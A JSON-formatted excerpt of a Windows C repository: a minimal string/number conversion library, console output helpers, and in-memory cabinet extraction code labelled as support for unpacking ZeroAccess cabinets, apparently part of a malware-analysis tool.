    "content": "#include \"rtltypes.h\"\n\nunsigned long hextoul_a(char *s)\n{\n\tunsigned long\tr = 0;\n\tchar\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = locase_a(*s);\n\t\ts++;\n\t\tif (_isdigit_a(c))\n\t\t\tr = 16 * r + (c - '0');\n\t\telse\n\t\t\tif ((c >= 'a') && (c <= 'f'))\n\t\t\t\tr = 16 * r + (c - 'a' + 10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n\nunsigned long hextoul_w(wchar_t *s)\n{\n\tunsigned long\tr = 0;\n\twchar_t\t\t\tc;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 ) {\n\t\tc = locase_w(*s);\n\t\ts++;\n\t\tif (_isdigit_w(c))\n\t\t\tr = 16*r + (c-L'0');\n\t\telse\n\t\t\tif ((c >= L'a') && (c <= L'f'))\n\t\t\t\tr = 16*r + (c-L'a'+10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n"
  },
  {
    "path": "Source/minirtl/i64tostr.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t i64tostr_a(signed long long x, char *s)\n{\n\tsigned long long\tt=x;\n\tsize_t\t\ti, r=1, sign;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (char)byteabs(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r + sign;\n}\n\nsize_t i64tostr_w(signed long long x, wchar_t *s)\n{\n\tsigned long long\tt=x;\n\tsize_t\t\ti, r=1, sign;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t} else {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r+sign;\n\t\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)byteabs(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r+sign;\n}\n"
  },
  {
    "path": "Source/minirtl/itostr.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t itostr_a(int x, char *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (char)byteabs(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r + sign;\n}\n\n\nsize_t itostr_w(int x, wchar_t *s)\n{\n\tint\t\tt;\n\tsize_t\ti, r = 1, sign;\n\n\tt = x;\n\n\tif (x < 0) {\n\t\tsign = 1;\n\t\twhile (t <= -10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\telse {\n\t\tsign = 0;\n\t\twhile (t >= 10) {\n\t\t\tt /= 10;\n\t\t\tr++;\n\t\t}\n\t}\n\n\tif (s == 0)\n\t\treturn r + sign;\n\n\tif (sign) {\n\t\t*s = '-';\n\t\ts++;\n\t}\n\n\tfor (i = r; i != 0; i--) {\n\t\ts[i - 1] = (wchar_t)byteabs(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r + sign;\n}\n"
  },
  {
    "path": "Source/minirtl/minirtl.h",
    "content": "/*\nModule name:\n\tminirtl.h\n\nDescription:\n\theader for string handling and conversion routines\n\nDate:\n\t1 Mar 2015\n*/\n\n#ifndef _MINIRTL_\n#define _MINIRTL_\n\n// string copy/concat/length\n\nchar *_strend_a(const char *s);\nwchar_t *_strend_w(const wchar_t *s);\n\nchar *_strcpy_a(char *dest, const char *src);\nwchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strcat_a(char *dest, const char *src);\nwchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);\n\nsize_t _strlen_a(const char *s);\nsize_t _strlen_w(const wchar_t *s);\n\n// comparing\n\nint _strcmp_a(const char *s1, const char *s2);\nint _strcmp_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmp_a(const char *s1, const char *s2, size_t cchars);\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nint _strcmpi_a(const char *s1, const char *s2);\nint _strcmpi_w(const wchar_t *s1, const wchar_t *s2);\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars);\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);\n\nchar *_strstr_a(const char *s, const char *sub_s);\nwchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);\n\nchar *_strstri_a(const char *s, const char *sub_s);\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);\n\n// conversion of integer types to string, returning string length\n\nsize_t ultostr_a(unsigned long x, char *s);\nsize_t ultostr_w(unsigned long x, wchar_t *s);\n\nsize_t ultohex_a(unsigned long x, char *s);\nsize_t ultohex_w(unsigned long x, wchar_t *s);\n\nsize_t itostr_a(int x, char *s);\nsize_t itostr_w(int x, wchar_t *s);\n\nsize_t i64tostr_a(signed long long x, char *s);\nsize_t i64tostr_w(signed long long x, wchar_t *s);\n\nsize_t u64tostr_a(unsigned long long x, char *s);\nsize_t u64tostr_w(unsigned long long x, 
wchar_t *s);\n\nsize_t u64tohex_a(unsigned long long x, char *s);\nsize_t u64tohex_w(unsigned long long x, wchar_t *s);\n\n// string to integers conversion\n\nunsigned long strtoul_a(char *s);\nunsigned long strtoul_w(wchar_t *s);\n\nunsigned long long strtou64_a(char *s);\nunsigned long long strtou64_w(wchar_t *s);\n\nunsigned long hextoul_a(char *s);\nunsigned long hextoul_w(wchar_t *s);\n\nint strtoi_a(char *s);\nint strtoi_w(wchar_t *s);\n\nsigned long long strtoi64_a(char *s);\nsigned long long strtoi64_w(wchar_t *s);\n\nunsigned long long hextou64_a(char *s);\nunsigned long long hextou64_w(wchar_t *s);\n\n/* =================================== */\n\n#ifdef UNICODE\n\n#define _strend _strend_w\n#define _strcpy _strcpy_w\n#define _strcat _strcat_w\n#define _strlen _strlen_w\n#define _strncpy _strncpy_w\n\n#define _strcmp _strcmp_w\n#define _strncmp _strncmp_w\n#define _strcmpi _strcmpi_w\n#define _strncmpi _strncmpi_w\n#define _strstr _strstr_w\n#define _strstri _strstri_w\n\n#define ultostr ultostr_w\n#define ultohex ultohex_w\n#define itostr itostr_w\n#define i64tostr i64tostr_w\n#define u64tostr u64tostr_w\n#define u64tohex u64tohex_w\n\n#define strtoul strtoul_w\n#define hextoul hextoul_w\n#define strtoi strtoi_w\n#define strtoi64 strtoi64_w\n#define strtou64 strtou64_w\n#define hextou64 hextou64_w\n\n#else // ANSI\n\n#define _strend _strend_a\n#define _strcpy _strcpy_a\n#define _strcat _strcat_a\n#define _strlen _strlen_a\n#define _strncpy _strncpy_a\n#define _strcmp _strcmp_a\n\n#define _strcmp _strcmp_a\n#define _strncmp _strncmp_a\n#define _strcmpi _strcmpi_a\n#define _strncmpi _strncmpi_a\n#define _strstr _strstr_a\n#define _strstri _strstri_a\n\n#define ultostr ultostr_a\n#define ultohex ultohex_a\n#define itostr itostr_a\n#define i64tostr i64tostr_a\n#define u64tostr u64tostr_a\n#define u64tohex u64tohex_a\n\n#define strtoul strtoul_a\n#define hextoul hextoul_a\n#define strtoi strtoi_a\n#define strtoi64 strtoi64_a\n#define strtou64 
strtou64_a\n#define hextou64 hextou64_a\n\n#endif\n\n#endif /* _MINIRTL_ */\n"
  },
  {
    "path": "Source/minirtl/rtltypes.h",
    "content": "#ifndef _WCHAR_T_DEFINED\ntypedef unsigned short wchar_t;\n#define _WCHAR_T_DEFINED\n#endif  /* _WCHAR_T_DEFINED */\n\n#ifndef _SIZE_T_DEFINED\n#ifdef _WIN64\ntypedef unsigned __int64    size_t;\n#else  /* _WIN64 */\ntypedef __w64 unsigned int   size_t;\n#endif  /* _WIN64 */\n#define _SIZE_T_DEFINED\n#endif  /* _SIZE_T_DEFINED */\n\n__forceinline char locase_a(char c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline wchar_t locase_w(wchar_t c)\n{\n\tif ((c >= 'A') && (c <= 'Z'))\n\t\treturn c + 0x20;\n\telse\n\t\treturn c;\n}\n\n__forceinline char byteabs(char x) {\n\tif (x < 0)\n\t\treturn -x;\n\treturn x;\n}\n\n__forceinline int _isdigit_a(char x) {\n\treturn ((x >= '0') && (x <= '9'));\n}\n\n__forceinline int _isdigit_w(wchar_t x) {\n\treturn ((x >= L'0') && (x <= L'9'));\n}\n"
  },
  {
    "path": "Source/minirtl/strtoi.c",
    "content": "#include \"rtltypes.h\"\n\nint strtoi_a(char *s)\n{\n\tint\t\ta = 0, sign;\n\tchar\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase '-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase '+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10) + (c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n\nint strtoi_w(wchar_t *s)\n{\n\tint\t\t\ta = 0, sign;\n\twchar_t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase L'-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase L'+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n"
  },
  {
    "path": "Source/minirtl/strtoi64.c",
    "content": "#include \"rtltypes.h\"\n\nsigned long long strtoi64_a(char *s)\n{\n\tsigned long long\ta = 0, sign;\n\tchar\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase '-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase '+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_a(c))\n\t\t\ta = (a*10) + (c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n\nsigned long long strtoi64_w(wchar_t *s)\n{\n\tsigned long long\ta = 0, sign;\n\twchar_t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tswitch (*s) {\n\tcase L'-':\n\t\ts++;\n\t\tsign = -1;\n\t\tbreak;\n\n\tcase L'+':\n\t\ts++;\n\t\tsign = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tsign = 1;\n\t}\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a*sign;\n}\n"
  },
  {
    "path": "Source/minirtl/strtou64.c",
    "content": "#include \"rtltypes.h\"\n\nunsigned long long strtou64_a(char *s)\n{\n\tunsigned long long \ta = 0;\n\tchar\t\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n\nunsigned long long strtou64_w(wchar_t *s)\n{\n\tunsigned long long \ta = 0;\n\twchar_t\t\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = *s;\n\t\tif (_isdigit_w(c))\n\t\t\ta = (a*10)+(c-L'0');\n\t\telse\n\t\t\tbreak;\n\t\ts++;\n\t}\n\treturn a;\n}\n"
  },
  {
    "path": "Source/minirtl/strtoul.c",
    "content": "#include \"rtltypes.h\"\n\n#define ULONG_MAX_VALUE 0xffffffffUL\n\nunsigned long strtoul_a(char *s)\n{\n    unsigned long long  a = 0;\n    char                c;\n\n    if (s == 0)\n        return 0;\n\n    while (*s != 0) {\n        c = *s;\n        if (_isdigit_a(c))\n            a = (a*10)+(c-'0');\n        else\n            break;\n\n        if (a > ULONG_MAX_VALUE)\n            return ULONG_MAX_VALUE;\n\n        s++;\n    }\n    return (unsigned long)a;\n}\n\nunsigned long strtoul_w(wchar_t *s)\n{\n    unsigned long long\ta = 0;\n    wchar_t\t\t\tc;\n\n    if (s == 0)\n        return 0;\n\n    while (*s != 0) {\n        c = *s;\n        if (_isdigit_w(c))\n            a = (a * 10) + (c - L'0');\n        else\n            break;\n\n        if (a > ULONG_MAX_VALUE)\n            return ULONG_MAX_VALUE;\n\n        s++;\n    }\n    return (unsigned long)a;\n}\n"
  },
  {
    "path": "Source/minirtl/u64tohex.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t u64tohex_a(unsigned long long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c=0; c<16; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n\nsize_t u64tohex_w(unsigned long long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 16;\n\n\tfor (c = 0; c<16; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[15-c] = p;\n\t}\n\n\ts[16] = 0;\n\treturn 16;\n}\n"
  },
  {
    "path": "Source/minirtl/u64tostr.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t u64tostr_a(unsigned long long x, char *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t u64tostr_w(unsigned long long x, wchar_t *s)\n{\n\tunsigned long long\tt = x;\n\tsize_t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
  },
  {
    "path": "Source/minirtl/ultohex.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t ultohex_a(unsigned long x, char *s)\n{\n\tchar\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (char)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += '0';\n\t\telse\n\t\t\tp = 'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n\nsize_t ultohex_w(unsigned long x, wchar_t *s)\n{\n\twchar_t\tp;\n\tsize_t\tc;\n\n\tif (s==0)\n\t\treturn 8;\n\n\tfor (c=0; c<8; c++) {\n\t\tp = (wchar_t)(x & 0xf);\n\t\tx >>= 4;\n\n\t\tif (p<10)\n\t\t\tp += L'0';\n\t\telse\n\t\t\tp = L'A' + (p-10);\n\n\t\ts[7-c] = p;\n\t}\n\n\ts[8] = 0;\n\treturn 8;\n}\n"
  },
  {
    "path": "Source/minirtl/ultostr.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t ultostr_a(unsigned long x, char *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (char)(x % 10) + '0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (char)0;\n\treturn r;\n}\n\nsize_t ultostr_w(unsigned long x, wchar_t *s)\n{\n\tunsigned long\tt=x;\n\tsize_t\t\t\ti, r=1;\n\n\twhile ( t >= 10 ) {\n\t\tt /= 10;\n\t\tr++;\n\t}\n\n\tif (s == 0)\n\t\treturn r;\n\t\n\tfor (i = r; i != 0; i--) {\n\t\ts[i-1] = (wchar_t)(x % 10) + L'0';\n\t\tx /= 10;\n\t}\n\n\ts[r] = (wchar_t)0;\n\treturn r;\n}\n"
  },
  {
    "path": "Source/shared/cab.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       CAB.C\n*\n*  VERSION:     1.00\n*\n*  DATE:        18 Jan 2016\n*\n*  ZeroAccess cabinet extraction from memory buffer.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"cab.h\"\n\n#pragma comment(lib, \"cabinet.lib\")\nstatic CABDATA g_CabParam;\n\n/*\n* fdiAlloc\n*\n* Purpose:\n*\n* Callback function to allocate memory.\n*\n*/\nvoid* DIAMONDAPI fdiAlloc(\n\tULONG cb\n\t)\n{\n\treturn LocalAlloc(LPTR, cb);\n}\n\n/*\n* fdiFree\n*\n* Purpose:\n*\n* Callback function to free previously allocated memory.\n*\n*/\nvoid DIAMONDAPI fdiFree(\n\tvoid HUGE *pv\n\t)\n{\n\tif (pv) {\n\t\tLocalFree(pv);\n\t}\n}\n\n/*\n* fdiClose\n*\n* Purpose:\n*\n* Callback function to release memory allocated for file memory stream.\n*\n*/\nint DIAMONDAPI fdiClose(\n\tCABDATA *hf\n\t)\n{\n\tLocalFree((HLOCAL)hf);\n\treturn 0;\n}\n\n/*\n* fdiOpen\n*\n* Purpose:\n*\n* Callback function to create a memory stream.\n*\n*/\nINT_PTR DIAMONDAPI fdiOpen(\n\tLPSTR pszFile,\n\tint   oflag,\n\tint   pmode\n\t)\n{\n\tCABDATA *Data = NULL;\n\tCABDATA *param;\n\t\n\tULONG_PTR value;\n\n\tUNREFERENCED_PARAMETER(oflag);\n\tUNREFERENCED_PARAMETER(pmode);\n\n#ifdef _WIN64\n\tvalue = strtou64_a(pszFile);\n#else\n\tvalue = strtoul_a(pszFile);\n#endif\n\tparam = (CABDATA *)value;\n\n\tData = (CABDATA*)LocalAlloc(LPTR, sizeof(CABDATA));\n\tif (Data) {\n\t\tData->Buffer = param->Buffer;\n\t\tData->Size = param->Size;\n\t\tData->Offset = 0;\n\t}\n\treturn (INT_PTR)Data;\n}\n\n/*\n* fdiRead\n*\n* Purpose:\n*\n* Callback function to read from memory stream.\n*\n*/\nUINT 
DIAMONDAPI fdiRead(\n\tCABDATA  *Data,\n\tvoid FAR *pv,\n\tUINT     cb\n\t)\n{\n\tUINT bytesToRead = cb;\n\t\n\tif (cb >= (UINT)(Data->Size - Data->Offset))\n\t\tbytesToRead = Data->Size - Data->Offset;\n\n\tmemcpy(pv, &Data->Buffer[Data->Offset], bytesToRead);\n\tData->Offset += bytesToRead;\n\treturn bytesToRead;\n}\n\n/*\n* fdiWrite\n*\n* Purpose:\n*\n* Callback function to write to the memory stream.\n*\n*/\nUINT fdiWrite(\n\tCABDATA  *Data,\n\tvoid FAR *pv,\n\tUINT     cb\n\t)\n{\n\tif ((LONG)(Data->Offset + cb) <= Data->Size) {\n\t\tmemcpy(&Data->Buffer[Data->Offset], pv, cb);\n\t\tData->Offset += cb;\n\t}\n\telse {\n\t\treturn 0;\n\t}\n\treturn cb;\n}\n\n/*\n* fdiSeek\n*\n* Purpose:\n*\n* Callback function to seek in memory stream.\n*\n*/\nlong fdiSeek(\n\tCABDATA *Data,\n\tlong    dist,\n\tint     seektype\n\t)\n{\n\tLONG pos = 0;\n\n\tif (seektype) {\n\t\tif (seektype != SEEK_CUR) {\n\t\t\treturn -1;\n\t\t}\n\t\tpos = dist + Data->Offset;\n\t}\n\telse\n\t{\n\t\tpos = dist;\n\t}\n\t// reject positions outside the buffer, a negative offset would make fdiRead/fdiWrite index before Buffer\n\tif ((pos < 0) || (pos > Data->Size))\n\t\treturn -1;\n\n\tData->Offset = pos;\n\treturn pos;\n}\n\n/*\n* fdiNotify\n*\n* Purpose:\n*\n*  Callback notification function to update the application on the status of the decoder.\n*\n*/\nINT_PTR DIAMONDAPI fdiNotify(FDINOTIFICATIONTYPE fdint, PFDINOTIFICATION pfdin)\n{\n\tINT_PTR Result = 0;\n\tCABDATA *Data, *ReturnData = NULL;\n\tLPSTR LookupFileName;\n\tLONG Size;\n\n\tswitch (fdint) {\n\n\tcase fdintCOPY_FILE:\n\n\t\tif (pfdin->pv == NULL)\n\t\t\tbreak;\n\n\t\tData = (CABDATA *)pfdin->pv;\n\t\tLookupFileName = (LPSTR)&Data->Size;\n\t\tSize = pfdin->cb;\n\t\tif (_strcmpi_a(LookupFileName, pfdin->psz1) == 0) {\n\t\t\tReturnData = LocalAlloc(LPTR, sizeof(CABDATA));\n\t\t\tif (ReturnData) {\n\t\t\t\tReturnData->Buffer = LocalAlloc(LPTR, pfdin->cb);\n\t\t\t\tif (ReturnData->Buffer == NULL) {\n\t\t\t\t\tLocalFree(ReturnData);\n\t\t\t\t\tReturnData = NULL;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tReturnData->Offset = 0;\n\t\t\t\t\tReturnData->Size = 
pfdin->cb;\n\t\t\t\t\tData->Buffer = ReturnData->Buffer;\n\t\t\t\t\tData->Size = ReturnData->Size;\n\t\t\t\t}\n\t\t\t\treturn (INT_PTR)ReturnData;\n\t\t\t}\n\t\t}\n\t\tbreak;\n\n\tcase fdintCLOSE_FILE_INFO: //release ReturnedInfo\n\t\tLocalFree((HLOCAL)pfdin->hf);\n\t\tResult = 1;\n\t\tbreak;\n\n\tdefault:\n\t\tbreak;\n\n\t}\n\treturn Result;\n}\n\n/*\n* SfcabExtractMemory\n*\n* Purpose:\n*\n* Process cabinet file in memory and extract it contents.\n*\n* On success returned buffer must be deallocated with LocalFree after usage.\n*\n*/\nPVOID SfcabExtractMemory(\n\tPVOID CabPtr,\n\tULONG CabSize,\n\tPULONG ExtractedBytes\n\t)\n{\n\n\tHFDI hfdi;\n\tERF erf;\n\tCHAR text[32];\n\tCHAR name[1];\n\tPVOID Buffer = NULL;\n\tCABDATA Data;\n\t\n\tif (ExtractedBytes == NULL)\n\t\treturn NULL;\n\n\t__try {\n\n\t\tRtlSecureZeroMemory(&erf, sizeof(ERF));\n\t\thfdi = FDICreate((PFNALLOC)fdiAlloc, (PFNFREE)fdiFree, (PFNOPEN)fdiOpen, (PFNREAD)fdiRead,\n\t\t\t(PFNWRITE)fdiWrite, (PFNCLOSE)fdiClose, (PFNSEEK)fdiSeek, cpu80386, &erf);\n\n\t\tif (hfdi) {\n\n\t\t\tg_CabParam.Buffer = CabPtr;\n\t\t\tg_CabParam.Size = CabSize;\n\t\t\tg_CabParam.Offset = 0;\n\n\t\t\tRtlSecureZeroMemory(&text, sizeof(text));\n#ifdef _WIN64\n\t\t\tu64tostr_a((ULONG_PTR)&g_CabParam, text);\n#else \n\t\t\tultostr_a((ULONG_PTR)&g_CabParam, text);\n#endif\n\n\t\t\tname[0] = 0;\n\n\t\t\tData.Size = '_';\n\t\t\tData.Buffer = NULL;\n\t\t\tData.Offset = 0;\n\t\t\tif (FDICopy(hfdi, name, text, 0, fdiNotify, 0, &Data)) {\n\t\t\t\tBuffer = Data.Buffer;\n\t\t\t\t*ExtractedBytes = Data.Size;\n\t\t\t}\n\t\t\tFDIDestroy(hfdi);\n\t\t}\n\t}\n\t__except (EXCEPTION_EXECUTE_HANDLER)\n\t{\n\t\treturn NULL;\n\t}\n\treturn Buffer;\n}\n"
  },
  {
    "path": "Source/shared/cab.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       CAB.H\n*\n*  VERSION:     1.01\n*\n*  DATE:        18 Jan 2016\n*\n*  Common header file for ZeroAccess cabinet extraction support.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include <fdi.h>\n\ntypedef struct _CABDATA {\n\tLONG Size;\n\tPUCHAR Buffer;\n\tLONG Offset;\n} CABDATA, *PCABDATA;\n\nPVOID SfcabExtractMemory(\n\tPVOID CabPtr,\n\tULONG CabSize,\n\tPULONG ExtractedBytes\n\t);\n"
  },
  {
    "path": "Source/shared/cui.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n*  TITLE:       CUI.C\n*\n*  VERSION:     1.02\n*\n*  DATE:        01 Dec 2017\n*\n*  Console output.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n/*\n* SfcuiPrintText\n*\n* Purpose:\n*\n* Output text to the console or file.\n*\n*/\nVOID SfcuiPrintText(\n    _In_ HANDLE hOutConsole,\n    _In_ LPWSTR lpText,\n    _In_ BOOL ConsoleOutputEnabled,\n    _In_ BOOL UseReturn\n)\n{\n    SIZE_T consoleIO;\n    DWORD bytesIO;\n    LPWSTR Buffer;\n\n    if (lpText == NULL)\n        return;\n\n    consoleIO = _strlen(lpText);\n    if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))\n        return;\n\n    consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);\n    Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);\n    if (Buffer) {\n\n        _strcpy(Buffer, lpText);\n        if (UseReturn) _strcat(Buffer, TEXT(\"\\r\\n\"));\n\n        consoleIO = _strlen(Buffer);\n\n        if (ConsoleOutputEnabled != FALSE) {\n            WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);\n        }\n        else {\n            WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);\n        }\n        RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);\n    }\n}\n"
  },
  {
    "path": "Source/shared/cui.h",
